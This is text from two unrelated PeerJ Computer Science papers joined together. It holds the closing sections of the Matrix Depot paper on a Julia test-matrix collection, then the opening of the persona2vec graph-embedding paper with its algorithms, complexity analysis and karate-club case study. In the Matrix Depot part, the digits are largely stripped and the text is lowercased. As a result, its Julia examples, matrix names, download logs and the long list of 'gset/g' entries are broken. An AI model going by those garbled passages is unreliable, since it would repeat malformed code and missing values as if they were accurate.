If r is a generated test problem, then r.A, r.b, and r.x are the matrix A and the vectors b and x respectively. If the solution is not provided by the problem, the output is stored as type RegProbNoSolution, which is defined as

immutable RegProbNoSolution{T}
    A::AbstractMatrix{T}   # matrix of interest
    b::AbstractVector{T}   # right-hand side
end

For example, the test problem wing can be generated as follows.

> matrixdepot("wing")
 A problem with a discontinuous solution
 =======================================

 Input options:

 * [type,] dim, t1, t2, [matrixonly]: the dimension of the matrix is dim.
   t1 and t2 are two real scalars such that 0 < t1 < t2 < 1.
   If matrixonly = false, the matrix A and vectors b and x in the linear system
   Ax = b will be generated (matrixonly = true by default).
 * [type,] n, [matrixonly]: t1 = 1/3 and t2 = 2/3.

 Groups: ["regprob"]

 References:
 G. M. Wing, A Primer on Integral Equations of the First Kind,
 Society for Industrial and Applied Mathematics.
> a = matrixdepot("wing", ) x array{float , }: . . . . . . . . . . . . . . . . > r = matrixdepot("wing", , false) test problems for regularization methods a: x array{float , }: . . . . . . . . . . . . . . . . b: -element array{float , }: . . . . x: -element array{float , }: . . . . > r.x -element array{float , }: . . . . matrix data from external sources matrix depot provides access to matrices from matrix market (boisvert et al., ) and the university of florida sparse matrix collection (davis & hu, ), both of which contain many matrices taken from applications. in particular, these sources contain many large, sparse matrices. matrix market and the university of florida sparse matrix collection both categorize matrices by application domain and the problem source and both provide matrices in matrix market format (boisvert, pozo & remington, ). these similarities allow us to design a generic interface for both collections. the symbol :get (or :g) is used for downloading matrices from both collections and the symbol :read (or :r) is used for reading in matrices already downloaded. downloaded matrix data is stored on disk in the matrix market format and when read into julia is stored in the type sparsematrixcsc. zhang and higham ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. matrixdepot.update()downloads the matrix name data files from the two web servers. > matrixdepot.update() \% total \% received \% xferd average speed time time time current dload upload total spent left speed k k --:--:-- : : --:--:-- k \% total \% received \% xferd average speed time time time current dload upload total spent left speed --:--:-- : : --:--:-- the university of florida sparse matrix collection is divided into matrix groups and the group of a matrix forms part of the full name of the matrix (davis & hu, ). for example, the full name of the matrix _bus in the harwell-boeing collection is hb/ _bus. > matrixdepot("hb/ _bus", :get) \% total \% received \% xferd average speed time time time current dload upload total spent left speed : : : : --:--:-- > matrixdepot("hb/ _bus", :read) x symmetric{float ,sparsematrixcsc{float ,int }}: . . . ... . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . ... . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . ... ... . . . . . . . . . . ... . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ... . . . . . . . . . . . . . . . . . . matrices from the university of florida sparse matrix collection are stored in matrixdepot/data/uf and they are stored by group (to avoid duplicate names), i.e., one directory per group. similarly, matrices from matrix market are stored in matrixdepot/data/mm. both directories are untracked by git. many matrices in the university of florida sparse matrix collection contain problem-specific metadata, all of which is downloaded. the metadata is accessed by setting the keyword argument meta to true. then instead of returning the matrix, matrix depot will return the metadata (including the matrix) as a dictionary. for example, the imdb movie database zhang and higham ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. pajek/imdb has metadata related to actors and movies. the following command stores all the metadata of pajek/imdb in a variable r, where r["imdb"] is the matrix. 
> r = matrixdepot("pajek/imdb", :r, meta = true) dict{abstractstring,any} with entries: "imdb_colname" => "’la tata’ castro, maria tereza\n’la veneno’... "imdb_moviebacon" => x array{float , } "imdb_code" => "drama\nshort\ndocumentary\ncomedy\nwestern\nfamily... "imdb_kevinbacon" => x array{float , } "imdb_actorbacon" => x array{float , } "imdb_category" => x array{float , } "imdb" => x sparse matrix with float entries "imdb_year" => x array{float , } we can download a whole group of matrices from the university of florida sparse matrix collection using the command matrixdepot("group name/*", :get). the next example downloads all matrices in the gset group of matrices from random graphs (contributed by y. ye) then displays all the matrices in matrix depot, including the newly downloaded matrices. > matrixdepot("gset/*", :get) downloading all matrices in group gset... \% total \% received \% xferd average speed time time time current dload upload total spent left speed --:--:-- --:--:-- --:--:-- download:/home/weijian/.julia/v . /matrixdepot/src/../data/uf/gset/g .tar.gz g /g .mtx \% total \% received \% xferd average speed time time time current dload upload total spent left speed --:--:-- --:--:-- --:--:-- download:/home/weijian/.julia/v . /matrixdepot/src/../data/uf/gset/g .tar.gz g /g .mtx \% total \% received \% xferd average speed time time time current dload upload total spent left speed --:--:-- --:--:-- --:--:-- download:/home/weijian/.julia/v . /matrixdepot/src/../data/uf/gset/g .tar.gz g /g .mtx \% total \% received \% xferd average speed time time time current dload upload total spent left speed --:--:-- --:--:-- --:--:-- ... > matrixdepot() matrices: ) baart ) binomial ) blur ) cauchy ) chebspec ) chow ) circul ) clement ) companion ) deriv ) dingdong ) fiedler ) forsythe ) foxgood ) frank ) golub ) gravity ) grcar ) hadamard ) hankel ) heat ) hilb ) invhilb ) invol ) kahan ) kms ) lehmer ) lotkin ) magic ) minij ) moler ) neumann ) oscillate ) parallax ) parter ) pascal zhang and higham ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ) pei ) phillips ) poisson ) prolate ) randcorr ) rando ) randsvd ) rohess ) rosser ) sampling ) shaw ) spikes ) toeplitz ) tridiag ) triw ) ursell ) vand ) wathen ) wilkinson ) wing ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g groups: all data eigen ill-cond inverse pos-def random regprob sparse symmetric the full name of a matrix in matrix market comprises three parts: the collection name, the set name, and the matrix name. for example, the full name of the matrix bcsstk in the set bcsstruc from the harwell-boeing collection is harwell-boeing/bcsstruc /bcsstk . note that both set name and matrix name are in lower case. > matrixdepot("harwell-boeing/bcsstruc /bcsstk ", :get) \% total \% received \% xferd average speed time time time current dload upload total spent left speed k k : : : : --:--:-- download:/home/weijian/.julia/v . 
> matrixdepot("Harwell-Boeing/bcsstruc.../bcsstk...", :read)
(A sparse symmetric matrix with Float64 entries is returned.)

We recommend downloading matrices from the University of Florida sparse matrix collection when there is a choice, because almost every matrix from Matrix Market is included in it.

Concluding remarks

Matrix Depot follows in the footsteps of earlier collections of matrices. Its novelty is threefold. First, it is extensible by the user, and so can be adapted to the user's needs. In doing so it facilitates experimentation, and in particular makes it easier to do reproducible research. Second, it combines several existing test matrix collections, namely Higham's Test Matrix Toolbox, Hansen's regularization problems, and the University of Florida sparse matrix collection, in order to provide both parametrized test matrices and real-life sparse matrix data in a single framework. Third, it fully exploits the Julia language. It uses multiple dispatch to help provide a simple interface and, in particular, to allow matrices to be generated in any of the numeric data types supported by the language. Matrix Depot therefore anticipates the development of intrinsic support in Julia for computations with BigFloat and other data types.

Matrix Depot is an open source project (https://github.com/weijianzhang/MatrixDepot.jl) hosted on GitHub and is available under the MIT license, and a first release has been announced. Test coverage of the source code is measured by Codecov (https://codecov.io/). From GitHub traffic analytics, we learn that Matrix Depot receives a steady number of unique downloads (unique cloners) every month. Matrix Depot also benefits the development of other Julia packages. LightGraphs (https://github.com/juliagraphs/lightgraphs.jl), an optimized graph package for Julia, for example, has embedded Matrix Depot as its database. We built Matrix Depot to facilitate the development and testing of matrix (and other) algorithms in Julia, and we will continue to develop it by introducing new test matrices and integrating other test collections.

Acknowledgements

The authors are grateful to Jiahao Chen (MIT), Stefan Güttel (The University of Manchester), and Tim Davis (Texas A&M University) for suggestions, and to Per Christian Hansen for allowing us to incorporate problems from Regularization Tools.

Additional information and declarations

Funding

The work of Higham was supported by a European Research Council Advanced Grant (MATFUN) and an Engineering and Physical Sciences Research Council grant. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.
Grant disclosures

The following grant information was disclosed by the authors: European Research Council Advanced Grant MATFUN; Engineering and Physical Sciences Research Council grant.

Competing interests

Nicholas J. Higham is an Academic Editor for PeerJ Computer Science.

Author contributions

• Weijian Zhang conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, and reviewed drafts of the paper.
• Nicholas J. Higham conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, performed the computation work, and reviewed drafts of the paper.

Data availability

The following information was supplied regarding data availability: Matrix Depot: https://github.com/weijianzhang/MatrixDepot.jl.

References

Bai Z, Day D, Demmel J, Dongarra J. A test matrix collection for non-Hermitian eigenvalue problems. Technical report, Department of Computer Science, University of Tennessee, Knoxville. LAPACK Working Note.
Betcke T, Higham NJ, Mehrmann V, Schröder C, Tisseur F. NLEVP: a collection of nonlinear eigenvalue problems. ACM Transactions on Mathematical Software.
Bezanson J, Edelman A, Karpinski S, Shah VB. Julia: a fresh approach to numerical computing. arXiv preprint.
Bezanson J, Karpinski S, Shah VB, Edelman A. Julia: a fast dynamic language for technical computing. arXiv preprint.
Boisvert RF, Pozo R, Remington K, Barrett RF, Dongarra JJ. Matrix Market: a web resource for test matrix collections. In: Boisvert RF, ed. Quality of Numerical Software: Assessment and Enhancement. London: Chapman and Hall.
Boisvert RF, Pozo R, Remington KA. The Matrix Market exchange formats: initial design. Technical report NISTIR, National Institute of Standards and Technology, Gaithersburg.
Clement PA. A class of triple-diagonal matrices for test purposes. SIAM Review.
Davis TA, Hu Y. The University of Florida sparse matrix collection. ACM Transactions on Mathematical Software. Available at http://www.cise.ufl.edu/research/sparse/matrices.
Donoho DL, Stodden V. Reproducible research in the mathematical sciences. In: Higham NJ, Dennis MR, Glendinning P, Martin PA, Santosa F, Tanner J, eds. The Princeton Companion to Applied Mathematics. Princeton: Princeton University Press.
Duff IS, Grimes RG, Lewis JG. Sparse matrix test problems. ACM Transactions on Mathematical Software.
Fousse L, Hanrot G, Lefèvre V, Pélissier P, Zimmermann P. MPFR: a multiple-precision binary floating-point library with correct rounding. ACM Transactions on Mathematical Software.
Gear CW. A simple set of test matrices for eigenvalue programs. Mathematics of Computation.
Gregory RT, Karney DL. A Collection of Matrices for Testing Computational Algorithms. New York: Wiley. Reprinted with corrections by Robert E. Krieger, Huntington, New York.
Hansen PC. Regularization Tools: a MATLAB package for analysis and solution of discrete ill-posed problems. Numerical Algorithms.
Hansen PC.
Rank-Deficient and Discrete Ill-Posed Problems: Numerical Aspects of Linear Inversion. Philadelphia: Society for Industrial and Applied Mathematics.
Hansen PC. Regularization Tools version 4.0 for MATLAB 7.3. Numerical Algorithms.
Hansen PC. Regularization Tools: a MATLAB package for analysis and solution of discrete ill-posed problems (user manual). Report, Informatics and Mathematical Modelling, Technical University of Denmark, Lyngby, Denmark.
Hansen PC. Discrete Inverse Problems: Insight and Algorithms. Philadelphia: Society for Industrial and Applied Mathematics.
Higham NJ. Algorithm 694: a collection of test matrices in MATLAB. ACM Transactions on Mathematical Software.
Higham NJ. The Test Matrix Toolbox for MATLAB. Numerical Analysis Report, Manchester Centre for Computational Mathematics, Manchester, England.
Higham NJ. Accuracy and Stability of Numerical Algorithms. Second edition. Philadelphia: Society for Industrial and Applied Mathematics.
Marques OA, Vömel C, Demmel JW, Parlett BN. Algorithm 880: a testing infrastructure for symmetric tridiagonal eigensolvers. ACM Transactions on Mathematical Software.
Pei ML. A test matrix for inversion procedures. Communications of the ACM.
Taylor A, Higham DJ. CONTEST: a controllable test matrix toolbox for MATLAB. ACM Transactions on Mathematical Software.

persona2vec: a flexible multi-role representations learning framework for graphs

Jisung Yoon, Kai-Cheng Yang, Woo-Sung Jung, and Yong-Yeol Ahn

Department of Industrial and Management Engineering, Pohang University of Science and Technology, Pohang, Republic of Korea
Center for Complex Networks and Systems Research, Luddy School of Informatics, Computing, and Engineering, Indiana University, Bloomington, IN, USA
Department of Physics, Pohang University of Science and Technology, Pohang, Republic of Korea
Asia Pacific Center for Theoretical Physics, Pohang, Republic of Korea
Connection Science, Massachusetts Institute of Technology, Cambridge, MA, USA
Network Science Institute, Indiana University, Bloomington, IN, USA

Abstract

Graph embedding techniques, which learn low-dimensional representations of a graph, are achieving state-of-the-art performance in many graph mining tasks. Most existing embedding algorithms assign a single vector to each node, implicitly assuming that a single representation is enough to capture all characteristics of the node. However, across many domains, it is common to observe pervasively overlapping community structure, where most nodes belong to multiple communities, playing different roles depending on the context. Here, we propose persona2vec, a graph embedding framework that efficiently learns multiple representations of nodes based on their structural contexts.
Using link prediction-based evaluation, we show that our framework is significantly faster than the existing state-of-the-art model while achieving better performance.

Subjects: Artificial Intelligence, Data Science, Network Science and Online Social Networks, Social Computing
Keywords: graph embedding, overlapping community, social context, social network analysis, link prediction

Introduction

Graph embedding maps the nodes in a graph to continuous and dense vectors that capture relations among the nodes (Perozzi, Al-Rfou & Skiena; Grover & Leskovec; Tang et al.). The resulting node representations allow direct application of algebraic operations and common algorithms, facilitating graph mining tasks such as node classification (Sen et al.; Perozzi, Al-Rfou & Skiena), community detection (Fortunato; Yang et al.), link prediction (Grover & Leskovec), visualization (Tang et al.), and computer vision (Xie et al.). Most methods map each node to a single vector, implicitly assuming that a single representation is sufficient to capture the full characteristics of a node. However, nodes often play multiple roles. For instance, people have multiple roles, or "personas", across contexts (e.g., professor, employee, and so on) (Ahn, Bagrow & Lehmann; Coscia et al.; Leskovec et al.; Leskovec, Lang & Mahoney). Similarly, proteins and other biological elements play multiple functional roles (Palla et al.; Gavin et al.; Ahn, Bagrow & Lehmann). Another example is the polysemy of words when their relations are modeled with graphs; many words possess multiple meanings differentiated by the context (Chen, Liu & Sun; Li & Jurafsky; Iacobacci, Pilehvar & Navigli). Explicit modeling of such multiplicity and overlapping clusters has been fruitful not only for community detection (Rosvall et al.; Coscia et al.; Epasto, Lattanzi & Paes Leme), but also for improving the quality of embedding (Li & Jurafsky; Epasto & Perozzi; Liu et al.). Yet, with the scarcity of embedding methods embracing this idea, the full potential of this approach has not been properly explored.

In this paper, we propose persona2vec, a scalable framework that builds on the idea of ego-splitting (Epasto, Lattanzi & Paes Leme), the process of identifying local structural contexts of a node by performing local community detection on the node's ego-network. For each detected local community (role), we transform the node into multiple personas if there are multiple local communities to which the node belongs. After the split, the original node is replaced by the new persona nodes, which inherit the connections from each local community, producing a new persona graph.
Instead of separating a node's persona nodes from each other completely (Epasto & Perozzi), we add directed, weighted edges between personas to capture their common origin. In doing so, we allow the direct application of existing graph embedding methods. In addition, we treat persona-based learning as fine-tuning of the base graph embedding, achieving both efficiency and a balance between information from the original graph and the persona graph. Compared with the previous approach (Epasto & Perozzi), our framework is conceptually simpler to understand and practically easier to implement. Furthermore, it achieves better performance in link prediction tasks while being much faster. We also would like to clarify that the primary purpose of persona splitting is not to obtain multiple representations, each of which may be suited for a specific task; it is to tease out the multiple contexts that a single node may possess. In other words, even with a single task, we argue that learning multiple representations for some nodes is highly beneficial. In sum, we would like to highlight that our approach (1) drastically lowers the barrier for combining existing algorithms with persona splitting, (2) significantly improves the efficiency of the ego-splitting approach, and (3) consistently outperforms the previous state-of-the-art model in the link prediction task. Our implementation of persona2vec is publicly available at https://github.com/jisungyoon/persona2vec.

Related work

In addition to graph embedding, our work is closely related to research on identifying overlapping communities in graphs. Various non-embedding methods such as link clustering (Ahn, Bagrow & Lehmann; Evans & Lambiotte), clique percolation (Palla et al.), and the mixed membership stochastic blockmodel (Airoldi et al.) have been proposed. Another thread of work focuses on using local graph structure to extract community information (Coscia et al.; Epasto et al.; Epasto, Lattanzi & Paes Leme). Specifically, Epasto, Lattanzi & Paes Leme introduce the persona graph method for detecting overlapping communities in graphs, leveraging ego-network partitioning. The combination of ego-network analysis and graph embedding methods is still rare. An example is Splitter (Epasto & Perozzi), which we use as the baseline in this paper. Instead of constraining the relations between personas with a regularization term, we propose a simpler and more efficient way of adding persona edges to the graph.

Our work is also related to the word disambiguation problem in word embedding. Recently, word embedding techniques (Mikolov et al.; Pennington, Socher & Manning) have been extensively applied to various NLP tasks, as the vectorized word representations can effectively capture syntactic and semantic information. Although some words have multiple senses depending on the context, the original word embedding methods only assign one vector to each word. Li & Jurafsky show that an embedding that is aware of multiple word senses and provides a vector for each specific sense does improve the performance for some NLP tasks.
To address this issue, some works utilize local context information and clustering to identify word senses (Reisinger & Mooney; Wu & Giles; Neelakantan et al.), some resort to external lexical databases for disambiguation (Rothe & Schütze; Iacobacci, Pilehvar & Navigli; Camacho-Collados, Pilehvar & Navigli; Chen, Liu & Sun; Jauhar, Dyer & Hovy; Pelevina et al.), while others combine topic modeling methods with embedding (Liu, Qiu & Huang; Liu et al.; Cheng et al.; Zhang & Zhong). We adopt the idea of assigning multiple vectors to each node in the graph to represent different roles, as well as the idea of exploiting local graph structure for this purpose.

Proposed method: persona2vec

persona2vec creates a persona graph, where some nodes are split into multiple personas. We then apply a graph embedding algorithm to the persona graph to learn the embeddings of the personas (see Fig. 1). Let us explain the method formally. Let G = (V, E) be a graph with a set of nodes V and a set of edges E; |V| and |E| denote the number of nodes and edges respectively. Let f : V → R^d be the embedding function that maps a node v to a d-dimensional vector space (d ≪ |V|).

Refined ego-splitting

We adopt and refine the ego-splitting method (Epasto, Lattanzi & Paes Leme; Epasto & Perozzi). For each node in the original graph, we first extract its ego-graph, remove the ego, and identify the local clusters. Every cluster in the ego-graph leads to a new persona node in the persona graph (see Figs. 1A and 1C). For example, if we consider each connected component as a local community, node c in the original graph belongs to two non-overlapping clusters {a, b} and {d, e, f} in its ego-graph. Given these two clusters, in the persona graph c is split into c1 and c2 to represent the two roles in the respective clusters. c1 and c2 inherit the connections of c from the two clusters separately (see Fig. 1C). On the other hand, node a only belongs to one ego cluster {b, c}, so it does not split into multiple personas.

Any graph clustering algorithm can be employed for splitting a node into personas. The simplest choice is to consider each connected component in the ego-network (sans the ego) as a cluster. This approach is fast and works well on sparse graphs. However, in dense graphs, ego-networks are more likely to form fewer connected components, so other algorithms such as the Louvain method (Blondel et al.), Infomap (Rosvall & Bergstrom), and label propagation (Raghavan, Albert & Kumara) would be more appropriate. In previous studies, the personas become disconnected from one another without retaining information about their origin, creating isolated components in the splitting process (Epasto, Lattanzi & Paes Leme; Epasto & Perozzi). Because of this disconnectedness, common embedding methods could not be directly applied to the split graph. A previous study attempted to address this issue by imposing a regularization term in the cost function to penalize the separation of persona nodes originating from the same node (Epasto & Perozzi). Here, instead of adopting the regularization strategy, we add weighted persona edges between the personas, maintaining the connectedness between them after the splitting (see Fig. 1C). Because the persona graph stays connected, classical graph algorithms and graph embedding methods can be readily applied without any modification.
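To make the splitting step concrete, the following is a minimal, dependency-free sketch of finding a node's ego clusters with the connected-component criterion. It is our own illustration (written in Julia, using a plain adjacency map), not the authors' released implementation, and the function and variable names are ours:

# adjacency map for an undirected graph: node => set of neighbours
# (illustrative data structure; any graph library could be used instead)
function ego_clusters(adj::Dict{Int,Set{Int}}, v::Int)
    remaining = copy(adj[v])          # neighbours of the ego v, still to be assigned
    clusters = Vector{Set{Int}}()     # connected components of the ego-network minus the ego
    while !isempty(remaining)
        seed = first(remaining)
        cluster = Set([seed])
        frontier = [seed]
        while !isempty(frontier)      # breadth/depth-first walk restricted to the ego-network
            u = pop!(frontier)
            for w in intersect(adj[u], adj[v])
                if !(w in cluster)
                    push!(cluster, w)
                    push!(frontier, w)
                end
            end
        end
        push!(clusters, cluster)
        setdiff!(remaining, cluster)  # remove the processed component
    end
    return clusters
end

# every returned cluster becomes one persona of v; personas of the same node are
# then connected by directed persona edges whose weight is lambda times the
# persona's out-degree, as described in the text below.

With the Louvain method or Infomap substituted for the connected-component criterion, only this clustering step changes; the rest of the persona graph construction stays the same.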
As we will show later, our strategy achieves both better scalability and better performance. In the persona graph, we set the weights of the unweighted original edges to 1 and tune the strength of the connections among personas with λ. Persona edges are directed and weighted, with weight λk_i^o, where k_i^o is the out-degree of persona node i after splitting (see Fig. 1C). Assigning a weight proportional to k_i^o helps the random walker explore both the local neighbors and the parts of the graph connected to the other personas, regardless of the out-degree k_i^o.

Figure 1: Illustration of the persona2vec framework. (A) A graph with an overlapping community structure. (B) A graph embedding of the original graph is obtained first to initialize the persona embeddings. (C) The original graph is transformed into a persona graph. Every edge in the original graph is preserved in the persona graph, while new directed persona edges with weight λk_i^o are added between the persona nodes. (D) Graph embedding is applied to the persona graph. (E) The final persona embedding, where each persona node has its own vector representation.

Imagine node u, which is split into n_p personas. Consider one of the personas, i, with out-degree k_i^o and persona edges with weight w_i. Then the probability p_i that an unbiased random walker at i visits neighbors connected by the original edges at the next step is

p_i = \frac{k_i^o}{k_i^o + n_p w_i}.   (1)

If we set a constant weight w_i = λ, then

p_i = \frac{k_i^o}{k_i^o + n_p \lambda} = \frac{1}{1 + n_p \lambda / k_i^o},   (2)

which depends on k_i^o. A random walker would rarely explore its local neighborhood if n_p ≫ k_i^o, while the opposite happens when n_p ≪ k_i^o. Instead, assigning the weight proportional to k_i^o, namely w_i = λk_i^o, removes this bias because

p_i = \frac{k_i^o}{k_i^o + n_p \lambda k_i^o} = \frac{1}{1 + n_p \lambda},   (3)

which is independent of k_i^o. Our experiments also show that using the out-degree yields better performance than assigning an identical weight to each persona edge. Our algorithm for refined ego-splitting is described in Algorithm 1. Note that it generalizes to directed graphs.

Persona graph embedding

As explained above, any graph embedding algorithm that recognizes edge direction and weight can be readily applied to the persona graph. Although we use node2vec as the embedding method here, other embedding methods can also be employed. We initialize the persona vectors with the vectors obtained from the original graph before ego-splitting (see Fig. 1B) to leverage the information from the original graph structure. Persona nodes that belong to the same node in the original graph are thus initialized with the same vector. We then execute the embedding algorithm for a small number of epochs to fine-tune the embedding vectors with the information from the persona graph (see Fig. 1D). Experiments show that usually only one epoch of training is enough. We find that training the embedding on the persona graph from scratch fails to yield comparable results.
Instead, initializing the embedding with the original graph, i.e., our present method, consistently improves the performance, suggesting that mixing the structural information from both the original graph and the persona graph is crucial. Our full algorithm is described in Algorithm 2.

Algorithm 1: Refined ego-splitting for generating the persona graph (case of the undirected graph).
Input: original graph G(V, E); weight parameter λ; non-overlapping local clustering algorithm C
Output: persona graph G_P(V_P, E_P); node-to-personas mapping V2P; persona-to-local-cluster mapping P2C
 1: function RefEgoSplit(G(V, E), λ, C)
 2:   for each v_o ∈ V do
 3:     P_{v_o} ← C(v_o)                                ▷ find local clusters of v_o
 4:     for each p ∈ P_{v_o} do
 5:       create v_p, and add it to G_P and V2P(v_o)     ▷ create persona nodes for local clusters
 6:       P2C(v_p) ← p
 7:   for each edge (v_i, v_j) in E do
 8:     w ← weight of the edge
 9:     for each persona node v_p in V2P(v_i) do
10:       for each persona node v'_p in V2P(v_j) do
11:         if v_i ∈ P2C(v'_p) and v_j ∈ P2C(v_p) then
12:           add original edges (v_p, v'_p, w), (v'_p, v_p, w) to E_P
13:   k^o ← out-degree sequence after adding the original edges
14:   for each v_o ∈ V do
15:     for each pair (v_i, v_j) in V2P(v_o) do
16:       add persona edges (v_i, v_j, k_i^o × λ), (v_j, v_i, k_j^o × λ) to E_P
17:   return G_P(V_P, E_P), V2P, P2C

Complexity

Space complexity. The persona graph is usually larger than the original graph, but not by too much. A node u with degree k_u may be split into at most k_u personas, so in the worst case the number of nodes in the persona graph can reach O(|E|). In practice, however, only a subset of nodes split into personas, and the number of personas rarely reaches this upper bound. Turning to the persona edges, for a node u with degree k_u at most O(k_u^2) new persona edges may be added. Thus, the whole persona graph has at most O(|V| k_max^2), or O(|V|^3) (since k_max ≤ |V|), extra persona edges. If the graph's degree distribution follows a power law P(k) ∼ k^{-γ}, then k_max ∼ |V|^{1/(γ-1)}. Hence the bound is O(|V|^{(γ+1)/(γ-1)}), which lies between O(|V|^2) and O(|V|^3) (as 2 ≤ γ ≤ 3 in general). However, real graphs tend to be sparse, with k_i ≪ |V|. If we further assume that k_i < \sqrt{|E|} holds for every node, then

\sum_{n=1}^{|V|} k_n^2 \le \sqrt{|E|} \sum_{n=1}^{|V|} k_n = 2|E|\sqrt{|E|},

so under this assumption the upper bound becomes O(|E|^{3/2}). Similarly, with the scale-free condition, the upper bound is O(|E| |V|^{1/(γ-1)}), which lies between O(|E| |V|^{1/2}) and O(|E| |V|). Again, in practice the number of persona edges is much smaller than these upper bounds. To illustrate, we list the number of nodes and persona edges in the persona graph for the graphs used in this paper in Table 1. All considered, the extra nodes and edges do not impose too much of a space burden in practice.

Time complexity. Assessing the time complexity requires consideration of the two steps: ego-splitting and embedding. The ego-splitting algorithm has complexity O(|E|^{3/2} + \sqrt{|E|}\, T(|E|)) in the worst case, where |E| is the number of edges in the original graph and T(|E|) is the
The embedding step on the persona graph, which dominates the whole procedure, has complexity O(γ t w d |V_P| (1 + log |V_P|)), the time complexity of node2vec, where |V_P| is the number of persona nodes, γ is the number of random walks per node, t is the walk length, d is the embedding dimension, and w is the window size (Chen et al.).

Algorithm 2: persona2vec — our method for generating persona node embeddings.
Input: G(V, E), the original graph; d, the embedding dimension; γ_b, t_b, w_b, the number of walks per node, walk length, and window size for the base embedding; γ_p, t_p, w_p, the same quantities for the persona embedding; α, the learning rate; RefEgoSplit, the refined ego-splitting method; V2P, the node-to-personas mapping; EmbeddingFunc, a graph embedding method (e.g., DeepWalk, node2vec).
Output: Φ_{G_P}, an n_p × d matrix with d-dimensional vector representations for all n_p persona nodes.
1: function persona2vec(G, d, γ_b, t_b, w_b, γ_p, t_p, w_p, RefEgoSplit, EmbeddingFunc, α)
2:   G_P, V2P ← RefEgoSplit(G)
3:   Φ_G ← EmbeddingFunc(G, d, γ_b, t_b, w_b, α)
4:   for each v_o ∈ V do
5:     for each persona node v_p ∈ V2P(v_o) do
6:       Φ_{G_P}(v_p) ← Φ_G(v_o)
7:   Φ_{G_P} ← EmbeddingFunc(G_P, d, γ_p, t_p, w_p, α, Φ_{G_P})
8:   return Φ_{G_P}

Table 1: descriptive statistics of the graphs used in the evaluation: the number of nodes |V|, the number of edges |E|, the number of nodes in the persona graph |V_P|, the ratio |V_P|/|V|, the number of persona edges |E_P| added by ego-splitting, and the ratio |E_P|/|E|^(3/2), i.e., relative to the space-complexity upper bound. The datasets are PPI, ca-HepTh, and ca-AstroPh (undirected) and Wiki-Vote and soc-Epinions (directed).

The final complexity is O(|E|^(3/2) + √|E| t(|E|)) + O(γ t w d |V| (1 + log |V|)). Removing the constant factors and assuming a close-to-linear local community detection algorithm, the whole process has time complexity O(|E|^(3/2)) and space complexity O(|E|^(3/2)) when k_i < √|E| holds; the complexity can increase depending on the clustering algorithm applied to the ego-networks. To test the validity of our assumptions, we sample graphs from a public network repository (Rossi & Ahmed), apply refined ego-splitting with connected-component clustering to these samples, and report the actual number of persona edges |E_P| against the practical upper bound |E|^(3/2) (see the figure below). The actual number of persona edges rarely exceeds the tighter upper bound that we propose and is usually orders of magnitude smaller.

Figure: comparison of the number of persona edges |E_P| to the practical upper bound |E|^(3/2).

Optimization

Any kind of graph embedding method can be considered; for simplicity, we choose the classical random-walk based embedding methods (e.g., node2vec, DeepWalk). In this model (Perozzi, Al-Rfou & Skiena), the probability of a node v_i co-occurring with a node v_j is estimated by

p(v_i | v_j) = exp(Φ_{v_i} · Φ'_{v_j}) / Σ_{k=1}^{|V|} exp(Φ_{v_k} · Φ'_{v_j}),   (4)

where Φ_{v_i} and Φ'_{v_i} are the 'input' and 'output' embeddings of node i. We use the input embedding Φ, which is known to be more useful and is more widely used. The denominator of Eq. (4) is computationally expensive (Yang et al.; Cao, Lu & Xu).
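As a quick illustration of why that denominator is the bottleneck, the sketch below evaluates Eq. (4) exactly with toy NumPy matrices (hypothetical random embeddings): a single probability costs a dot product with every node in the graph, which is what the approximations discussed next are designed to avoid.

import numpy as np

rng = np.random.default_rng(0)
n_nodes, dim = 1000, 16
Phi_in = rng.normal(size=(n_nodes, dim))     # 'input' embeddings, the vectors we keep
Phi_out = rng.normal(size=(n_nodes, dim))    # 'output' (context) embeddings

def p_cooccur(i, j):
    # Eq. (4): softmax of Phi_in[i] . Phi_out[j] over all nodes k -> O(|V| d) per query.
    scores = Phi_in @ Phi_out[j]
    scores -= scores.max()                   # numerical stability
    weights = np.exp(scores)
    return weights[i] / weights.sum()

print(p_cooccur(2, 3))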
There are two common approximations: hierarchical softmax (Morin & Bengio) and negative sampling (Mikolov et al.). We adopt negative sampling, not only because it is simpler and popular but also because it shows better performance in our setting.

Case study

Before diving into systematic evaluations, we provide two illustrative examples: Zachary's karate club network and a word association network.

Case study: Zachary's karate club network

We use Zachary's karate club network (Zachary), a well-known example for community detection. Nodes represent members of the karate club and edges represent ties among the members (panel A of the figure below). Although the network is often considered to have two large disjoint communities, smaller overlapping communities can also be seen, highlighted by a handful of bridge nodes. In panel B we present the persona graph of the network. persona2vec successfully recognizes these bridge nodes and places their personas in reasonable locations. Take one such node for example: it splits into four persona nodes, which then end up in two different communities, and the orange and green communities are clearly separated as a result. We also show the ten predictions with the highest scores from the link prediction experiment in panel D and confirm that the model predicts missing edges well.

